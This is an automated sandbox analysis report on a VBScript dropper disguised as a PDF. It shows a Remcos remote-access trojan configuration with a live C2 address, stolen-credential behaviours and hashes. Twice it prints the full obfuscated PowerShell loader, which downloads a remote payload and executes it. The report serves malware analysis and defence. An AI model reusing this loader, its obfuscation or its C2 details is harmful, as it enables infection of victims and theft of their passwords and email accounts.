Overview

overview

10

Static

static

1

CI+PL_pdf.vbs

windows7-x64

10

CI+PL_pdf.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    298s
  • max time network
    271s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    15-10-2024 01:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    CI+PL_pdf.vbs

  • Size

    10KB

  • MD5

    be47cb340cb887096ab69a01c4780227

  • SHA1

    8688904892b6f732ef8df362ad5d0b810de337d0

  • SHA256

    a459a81129cae256a1da0ec67918dbca56d91e95eb26b11bdac7f0c2a82580ec

  • SHA512

    3795692900b0f98be8ca11768446e21b5dae034b43645df3f6388273dea0de4cbbe78a36c56e085b40074ebdf7d5909e511106445527ae509c828be13d001e84

  • SSDEEP

    192:xiJSEyChBpc9D1smsU1VmCIX62aTf3RRBqwBoBVao8jmgwgKBrD:xu1BIRsmsU1Vmu1R8wwgOrD

Score
10/10
remcosremotehostcollectiondiscoveryexecutionrat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

154.216.18.214:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-AOD6MB

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 5 IoCs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CI+PL_pdf.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2288
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Deklameringerne Lodde Totalitarismen Counterphobic Bronchiocele #>;$Riffelgangens12='Cloudlet';<#Dumpede Markedsanalysens Teknokratiserer Gruppemedlemmerne Forflygtigede #>;$Gigabyter81ndeterminancy=$Hutukhtu103+$host.UI;function Betingelsesbindeordet($Hmoglobin){If ($Gigabyter81ndeterminancy) {$quechuan++;}$Baklygte=$Facilitates+$Hmoglobin.'Length'-$quechuan; for( $Gigabyter81=3;$Gigabyter81 -lt $Baklygte;$Gigabyter81+=4){$Programafprvning++;$Lative+=$Hmoglobin[$Gigabyter81];$Deputations='Brugsgaardes';}$Lative;}function Plderet($Posthypophysis){ & ($Clothespins) ($Posthypophysis);}$Eksamensrsenes=Betingelsesbindeordet 'UnwM FdoBe,zPrei s lIndlCo aFel/F s ';$Eksamensrsenes+=Betingelsesbindeordet 'Beh5 Ex.Rep0Gla sam(EnsWCogiHusnscld AeoL,nwDemsPit UdbN icT,yr Unm1F.e0Com. Un0Whi;,er aWMinimysnD s6Int4Ind;Tim ,umxUdl6Hav4Eel; yp PhyrForv.wi:s a1.ra3sam1.no. Fe0Tel) os PetGMegema c BlkLkkoHel/Typ2Red0M f1Dom0stu0 su1 e0bur1Emi E FsymiVurrhaeesorfQuio.umxI b/ D 1 No3,og1Kai. un0 o ';$Folkemindesamleres=Betingelsesbindeordet ' B UCris ie.muRsed-PomACapgArcEEp nFo tspa ';$Rattleskull=Betingelsesbindeordet 'deshgoltGeotJrgpgav:mal/ as/Ta,hPro2Po.z,olqEft. H sEmbhDaaoLovpBob/ onvLi.k dekNeofMedx Kej Coz UndOv,/sorAPenrKa rUdkaHulntiptFaglOpeyAmt.F rd efs lep Ko ';$substitutability=Betingelsesbindeordet ' so>Uns ';$Clothespins=Betingelsesbindeordet 'B ti IneFerxBra ';$Bamseklubben249='Giddies';$Rehearsable='\steamie.Non';Plderet (Betingelsesbindeordet 'skj$De GoveL TroCavbAneAArvl is:stuP floDaqLstaiKr.t D.iscoRsusaObsP,hap oroHooRspoT st=Ram$AffeTasn agvA c:PoiacraPKriPGepdscrarygTKniaDes+Cad$shor GsEMidh ,eE mA rr ,bs onA Rhb.idLCyneC e ');Plderet (Betingelsesbindeordet 'Luk$skoG shL InO AnBFa aHirlDeo: TikBliUEuslTaotDetu T r scc P e UsNFortKseRm nEUnisInc=Fan$HidRDuea HrTNattspaLPuneBrysKalkDa.UTe l aL V .,sys ltPIndlBagi V tHy.( ,e$KonsMatuZooB AlsoveTPiri ritDalUHofTWora slBAf iFellAmpiPattstoy Ch),ok ');Plderet (Betingelsesbindeordet 'Int[F.dNRece thTOve.Mals,laE Cor T VFr IskaCKuneFo.p aloka.i D NB,rTdism rmaG nNTjeAshaGAnaEUn,r P ]Qu.: en:Outs anEshocGoluT,bRC nIBr t ueYmowPC nR UrOChatGraOOffCErnoCheLsuc V l= Ba Obl[ rNUn eDksTAve.salsPaaEN nCReeuNo.R U IParTstayKonpFarr CuoLomt odOYarCFyroHumLFl tH aY Fup TeeGas] en:Fre:ModTUnrlTutsQrg1K.n2 em ');$Rattleskull=$Kulturcentres[0];$Anadesm=(Betingelsesbindeordet 'Rec$Camg DelJumOFilBO ta BeLDo,:KinzstuO teN ouEBy L N o epvsupsMerTBruiArbLAsplst A lDInsETruLRins EjeRedR EksL n=F tnG veU,sWRe - U ostrbCoaJNone Kac oTleu s.isArbYMissVolT AdeFugmUnm.sfoN,ole GoTLnt.J.vW.ykEAveBHouCApoLIrrikorERieNReptMol ');Plderet ($Anadesm);Plderet (Betingelsesbindeordet 'Fo,$EftZ FuoJubn Ine ulsnyostovRhesskytAf i .dls ml Gua BidP reBoilDr sCe eUdbr mosdam. ArHs,reFraaEksd UneLanrF rs Ju[Cy.$ BiFBoioseklAn,kBlaesu mPini PrnAerdCeceMelsPliaCapmTrolColeGymrPuteUg,sUnd]Bak=B.g$ TiEBulkM,sss lasn,mseme rinOvesB trPrusPareFran sqeDansBea ');$Astroglia=Betingelsesbindeordet 'ref$CemZsh o ,rnOveesenlUn oUmavFlysMort EuiEl.lP.olAmya .yd saeFanladjs ineTyprTers F .NonD .eo tyw,ain Pulmodo mpaMumdHicFMoniPl,l .ne.ec( ir$ HoRUslacrotDozt OplBareDobsR.mk NouDielKallBoo,Kde$ oLdu.aRefnMumcImpesydrPoheUdedRkkeAff)hag ';$Lancerede=$Politirapport;Plderet (Betingelsesbindeordet ' He$PeaGDriLErhoBalbKo A.ntL Ve:UdbJU vEU aR PoNVkss vvbR,sEAf sBetLData TbGMil=Aq,(A,ttBaheBe sB,tt Bo-,elPIs ADevt AnhFor For$BanlstoaParNH.sCMenEskiRElueVedDproe ,n) C ');while (!$Jernsbeslag) {Plderet (Betingelsesbindeordet ' Kv$VolgBe.lR.co Opb ataLavlKa :,onssuctsatrAanoFormcodaUdftL miF,ncHas2Far4 sl8.nm= sa$ matbr r l uOldeRom ') ;Plderet $Astroglia;Plderet (Betingelsesbindeordet 'N tsToaT Ava UnR AfT .n- sas,ftLTameMarEUdePsup k,a4 a ');Plderet (Betingelsesbindeordet 'Pte$r bgsatLVoloCo bBenAR aLPre:coujspoECrersodNCh sNo.B she NossheLKlaaE lgKas= A (Ov tGoreGens Frt ,g-,roP aaProTmrkhCer .u$VarlBunADefNGulc.njEsupRBorELarDTypeUnp) Ud ') ;Plderet (Betingelsesbindeordet ' sj$,anGFlulkeno ebIleAAckLsub:Fo,Tstea.etl ae leNPanTOutf amusnels rd,geeRrhs GeTpe.eCom1 ym5Gl.6syd=sai$Fi GCarL Foo M.B FlAra.L H : U.skartM rYR,dpsp sstuIKrfsTokE DisDet+Lat+ or%Kal$u lk I usmaLKauTtjtURetR shcR,bEVarnPrnt veRRe eBulsWil.Fa C AmO AsUBacnHo Tska ') ;$Rattleskull=$Kulturcentres[$Talentfuldeste156];}$Pastoralization=326374;$supercoincidence=28847;Plderet (Betingelsesbindeordet ',as$UndG eL s oFrdB fta ahlRat:Li.aMa CneiePlaTs naBerTslasP oIVallsolkslgE.taN v on= He K wGsvoeKa tOps- Pac AkosupnR sT,ndeWeeNKamt.nb Tra$Gy l.dsaFacN D C I E hoRAm E UndDateH l ');Plderet (Betingelsesbindeordet 'Mo $ H,gsynlArcoRocbIrraPaal s,:OveEBatn ChlperaI,fcwiteCirm nde E nDout sa Unm= Uv Taw[Piasskay Udse.tt Tee CumVis. HiC B,o Urn Atvsawe.alrHe,tsu ] sy:Kod:RigFGymrsido ,tmsalBF caWars Lae ,l6s r4CursPartTl,rkoniCocnsulgOst( Re$AntACerc .ie EntReaa fet EksCoai L l Phk stedksn,ar)Ras ');Plderet (Betingelsesbindeordet 'Ono$ComGst.LT.gosteBPo a uL T.:LynoKriuUncTOu r uOUdfa ecdB n .t=.en Ene[E.dsBenyEpisA gtBane amT a.upsTC peKasxBevtT.y. ndEN cNR.pCMicOCerdsj IR tn omGChl]Kon:Dia:PetastrsAdvCRetI UnIGy..K,rg ndEMi,T A sFo.tstir CaIBilnPolGAbo(Fun$ ,oesexNGumlHovA HacDecENicMsanesysNUn.TQu ) s ');Plderet (Betingelsesbindeordet 'Ta,$WeigFraL aOLavbsiga AfLLre: FoEChenOptdElaORatK ReR RaIAv,N frtUnv= as$OpsoAnsUVoktPharCorost.aMorDRea.Pa sspaUDifB MosGrotA,vr evIsprns ygst (For$OveP viA Z s.ortBloosniRFarAGgeLPariskiZFukapolTMeaIsliOBa nMu ,coo$.wesA cuKarPskaeNonrRencTaaoBl.i Ayn MacLaeiCard AlENe nLr.cPuaE en)No ');Plderet $Endokrint;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2832
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Deklameringerne Lodde Totalitarismen Counterphobic Bronchiocele #>;$Riffelgangens12='Cloudlet';<#Dumpede Markedsanalysens Teknokratiserer Gruppemedlemmerne Forflygtigede #>;$Gigabyter81ndeterminancy=$Hutukhtu103+$host.UI;function Betingelsesbindeordet($Hmoglobin){If ($Gigabyter81ndeterminancy) {$quechuan++;}$Baklygte=$Facilitates+$Hmoglobin.'Length'-$quechuan; for( $Gigabyter81=3;$Gigabyter81 -lt $Baklygte;$Gigabyter81+=4){$Programafprvning++;$Lative+=$Hmoglobin[$Gigabyter81];$Deputations='Brugsgaardes';}$Lative;}function Plderet($Posthypophysis){ & ($Clothespins) ($Posthypophysis);}$Eksamensrsenes=Betingelsesbindeordet 'UnwM FdoBe,zPrei s lIndlCo aFel/F s ';$Eksamensrsenes+=Betingelsesbindeordet 'Beh5 Ex.Rep0Gla sam(EnsWCogiHusnscld AeoL,nwDemsPit UdbN icT,yr Unm1F.e0Com. Un0Whi;,er aWMinimysnD s6Int4Ind;Tim ,umxUdl6Hav4Eel; yp PhyrForv.wi:s a1.ra3sam1.no. Fe0Tel) os PetGMegema c BlkLkkoHel/Typ2Red0M f1Dom0stu0 su1 e0bur1Emi E FsymiVurrhaeesorfQuio.umxI b/ D 1 No3,og1Kai. un0 o ';$Folkemindesamleres=Betingelsesbindeordet ' B UCris ie.muRsed-PomACapgArcEEp nFo tspa ';$Rattleskull=Betingelsesbindeordet 'deshgoltGeotJrgpgav:mal/ as/Ta,hPro2Po.z,olqEft. H sEmbhDaaoLovpBob/ onvLi.k dekNeofMedx Kej Coz UndOv,/sorAPenrKa rUdkaHulntiptFaglOpeyAmt.F rd efs lep Ko ';$substitutability=Betingelsesbindeordet ' so>Uns ';$Clothespins=Betingelsesbindeordet 'B ti IneFerxBra ';$Bamseklubben249='Giddies';$Rehearsable='\steamie.Non';Plderet (Betingelsesbindeordet 'skj$De GoveL TroCavbAneAArvl is:stuP floDaqLstaiKr.t D.iscoRsusaObsP,hap oroHooRspoT st=Ram$AffeTasn agvA c:PoiacraPKriPGepdscrarygTKniaDes+Cad$shor GsEMidh ,eE mA rr ,bs onA Rhb.idLCyneC e ');Plderet (Betingelsesbindeordet 'Luk$skoG shL InO AnBFa aHirlDeo: TikBliUEuslTaotDetu T r scc P e UsNFortKseRm nEUnisInc=Fan$HidRDuea HrTNattspaLPuneBrysKalkDa.UTe l aL V .,sys ltPIndlBagi V tHy.( ,e$KonsMatuZooB AlsoveTPiri ritDalUHofTWora slBAf iFellAmpiPattstoy Ch),ok ');Plderet (Betingelsesbindeordet 'Int[F.dNRece thTOve.Mals,laE Cor T VFr IskaCKuneFo.p aloka.i D NB,rTdism rmaG nNTjeAshaGAnaEUn,r P ]Qu.: en:Outs anEshocGoluT,bRC nIBr t ueYmowPC nR UrOChatGraOOffCErnoCheLsuc V l= Ba Obl[ rNUn eDksTAve.salsPaaEN nCReeuNo.R U IParTstayKonpFarr CuoLomt odOYarCFyroHumLFl tH aY Fup TeeGas] en:Fre:ModTUnrlTutsQrg1K.n2 em ');$Rattleskull=$Kulturcentres[0];$Anadesm=(Betingelsesbindeordet 'Rec$Camg DelJumOFilBO ta BeLDo,:KinzstuO teN ouEBy L N o epvsupsMerTBruiArbLAsplst A lDInsETruLRins EjeRedR EksL n=F tnG veU,sWRe - U ostrbCoaJNone Kac oTleu s.isArbYMissVolT AdeFugmUnm.sfoN,ole GoTLnt.J.vW.ykEAveBHouCApoLIrrikorERieNReptMol ');Plderet ($Anadesm);Plderet (Betingelsesbindeordet 'Fo,$EftZ FuoJubn Ine ulsnyostovRhesskytAf i .dls ml Gua BidP reBoilDr sCe eUdbr mosdam. ArHs,reFraaEksd UneLanrF rs Ju[Cy.$ BiFBoioseklAn,kBlaesu mPini PrnAerdCeceMelsPliaCapmTrolColeGymrPuteUg,sUnd]Bak=B.g$ TiEBulkM,sss lasn,mseme rinOvesB trPrusPareFran sqeDansBea ');$Astroglia=Betingelsesbindeordet 'ref$CemZsh o ,rnOveesenlUn oUmavFlysMort EuiEl.lP.olAmya .yd saeFanladjs ineTyprTers F .NonD .eo tyw,ain Pulmodo mpaMumdHicFMoniPl,l .ne.ec( ir$ HoRUslacrotDozt OplBareDobsR.mk NouDielKallBoo,Kde$ oLdu.aRefnMumcImpesydrPoheUdedRkkeAff)hag ';$Lancerede=$Politirapport;Plderet (Betingelsesbindeordet ' He$PeaGDriLErhoBalbKo A.ntL Ve:UdbJU vEU aR PoNVkss vvbR,sEAf sBetLData TbGMil=Aq,(A,ttBaheBe sB,tt Bo-,elPIs ADevt AnhFor For$BanlstoaParNH.sCMenEskiRElueVedDproe ,n) C ');while (!$Jernsbeslag) {Plderet (Betingelsesbindeordet ' Kv$VolgBe.lR.co Opb ataLavlKa :,onssuctsatrAanoFormcodaUdftL miF,ncHas2Far4 sl8.nm= sa$ matbr r l uOldeRom ') ;Plderet $Astroglia;Plderet (Betingelsesbindeordet 'N tsToaT Ava UnR AfT .n- sas,ftLTameMarEUdePsup k,a4 a ');Plderet (Betingelsesbindeordet 'Pte$r bgsatLVoloCo bBenAR aLPre:coujspoECrersodNCh sNo.B she NossheLKlaaE lgKas= A (Ov tGoreGens Frt ,g-,roP aaProTmrkhCer .u$VarlBunADefNGulc.njEsupRBorELarDTypeUnp) Ud ') ;Plderet (Betingelsesbindeordet ' sj$,anGFlulkeno ebIleAAckLsub:Fo,Tstea.etl ae leNPanTOutf amusnels rd,geeRrhs GeTpe.eCom1 ym5Gl.6syd=sai$Fi GCarL Foo M.B FlAra.L H : U.skartM rYR,dpsp sstuIKrfsTokE DisDet+Lat+ or%Kal$u lk I usmaLKauTtjtURetR shcR,bEVarnPrnt veRRe eBulsWil.Fa C AmO AsUBacnHo Tska ') ;$Rattleskull=$Kulturcentres[$Talentfuldeste156];}$Pastoralization=326374;$supercoincidence=28847;Plderet (Betingelsesbindeordet ',as$UndG eL s oFrdB fta ahlRat:Li.aMa CneiePlaTs naBerTslasP oIVallsolkslgE.taN v on= He K wGsvoeKa tOps- Pac AkosupnR sT,ndeWeeNKamt.nb Tra$Gy l.dsaFacN D C I E hoRAm E UndDateH l ');Plderet (Betingelsesbindeordet 'Mo $ H,gsynlArcoRocbIrraPaal s,:OveEBatn ChlperaI,fcwiteCirm nde E nDout sa Unm= Uv Taw[Piasskay Udse.tt Tee CumVis. HiC B,o Urn Atvsawe.alrHe,tsu ] sy:Kod:RigFGymrsido ,tmsalBF caWars Lae ,l6s r4CursPartTl,rkoniCocnsulgOst( Re$AntACerc .ie EntReaa fet EksCoai L l Phk stedksn,ar)Ras ');Plderet (Betingelsesbindeordet 'Ono$ComGst.LT.gosteBPo a uL T.:LynoKriuUncTOu r uOUdfa ecdB n .t=.en Ene[E.dsBenyEpisA gtBane amT a.upsTC peKasxBevtT.y. ndEN cNR.pCMicOCerdsj IR tn omGChl]Kon:Dia:PetastrsAdvCRetI UnIGy..K,rg ndEMi,T A sFo.tstir CaIBilnPolGAbo(Fun$ ,oesexNGumlHovA HacDecENicMsanesysNUn.TQu ) s ');Plderet (Betingelsesbindeordet 'Ta,$WeigFraL aOLavbsiga AfLLre: FoEChenOptdElaORatK ReR RaIAv,N frtUnv= as$OpsoAnsUVoktPharCorost.aMorDRea.Pa sspaUDifB MosGrotA,vr evIsprns ygst (For$OveP viA Z s.ortBloosniRFarAGgeLPariskiZFukapolTMeaIsliOBa nMu ,coo$.wesA cuKarPskaeNonrRencTaaoBl.i Ayn MacLaeiCard AlENe nLr.cPuaE en)No ');Plderet $Endokrint;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2644
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1036
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\oneawjhwmcxbebtdhkeuuh"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1976
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\yhrtxbrpakpgghphyvrwxmhxj"
        3⤵
        • Accesses Microsoft Outlook accounts
        • System Location Discovery: System Language Discovery
        PID:1940
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\bbxlxukrnshlrvdlifmpizbojrrrm"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1064

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\oneawjhwmcxbebtdhkeuuh
    Filesize

    2B

    MD5

    f3b25701fe362ec84616a93a45ce9998

    SHA1

    d62636d8caec13f04e28442a0a6fa1afeb024bbb

    SHA256

    b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

    SHA512

    98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XH2Q5IVV1U1VZJH42ZAE.temp
    Filesize

    7KB

    MD5

    2747caef2e0c17694135c16a72cce47c

    SHA1

    d3c857693951b7af561be4baa5768bc3458cebef

    SHA256

    245c85b6c875f97030dce798374fa7b61ef88f6484b48997d9cc24612f12b48b

    SHA512

    2ad40d9f4b7982ae4ba1e41ec399c14001f5d9fbcb5607cd9f57aa5c41f9ef8e0bdd9f0067206a01937ee823bff7461e580e6888e7d691bf7415996b0fe52cf8

    Download Submit

  • C:\Users\Admin\AppData\Roaming\steamie.Non
    Filesize

    462KB

    MD5

    dee52a1c145167c55fe513ff006d3768

    SHA1

    6f9ccd885145de403d5e91a458cec7d36b4da7e2

    SHA256

    4b5eb0b6877f4804a3c2c9629493f3d1c68b02730d81055ed1139113337c6284

    SHA512

    ec44c6ab4623cc16479c507ead3e5b90119f49670f56997a4f70329003703a9c74c804ebecfd50bf07c0dee2c6399708df5a7550dc27baeb5699980eb6c5a3af

    Download Submit

  • memory/1036-63-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-65-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-51-0x0000000021210000-0x0000000021229000-memory.dmp

    Filesize

    100KB

    Download

  • memory/1036-77-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-76-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-75-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-74-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-50-0x0000000021210000-0x0000000021229000-memory.dmp

    Filesize

    100KB

    Download

  • memory/1036-18-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-23-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-72-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-71-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-70-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-69-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-52-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-67-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-66-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-64-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-62-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-61-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-60-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-59-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-58-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-57-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-56-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-47-0x0000000021210000-0x0000000021229000-memory.dmp

    Filesize

    100KB

    Download

  • memory/1036-55-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-73-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-68-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-53-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1036-54-0x00000000005F0000-0x0000000001652000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1064-38-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/1064-37-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/1064-41-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/1064-40-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/1940-35-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

    Download

  • memory/1940-30-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

    Download

  • memory/1940-29-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1940-31-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

    Download

  • memory/1940-33-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

    Download

  • memory/1976-26-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/1976-28-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/1976-34-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/1976-25-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/1976-24-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2644-17-0x0000000006690000-0x000000000ACE8000-memory.dmp

    Filesize

    70.3MB

    Download

  • memory/2832-7-0x000007FEF5020000-0x000007FEF59BD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2832-5-0x000000001B6B0000-0x000000001B992000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2832-9-0x000007FEF5020000-0x000007FEF59BD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2832-10-0x000007FEF5020000-0x000007FEF59BD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2832-8-0x000007FEF5020000-0x000007FEF59BD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2832-6-0x00000000025F0000-0x00000000025F8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2832-13-0x000007FEF5020000-0x000007FEF59BD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2832-4-0x000007FEF52DE000-0x000007FEF52DF000-memory.dmp

    Filesize

    4KB

    Download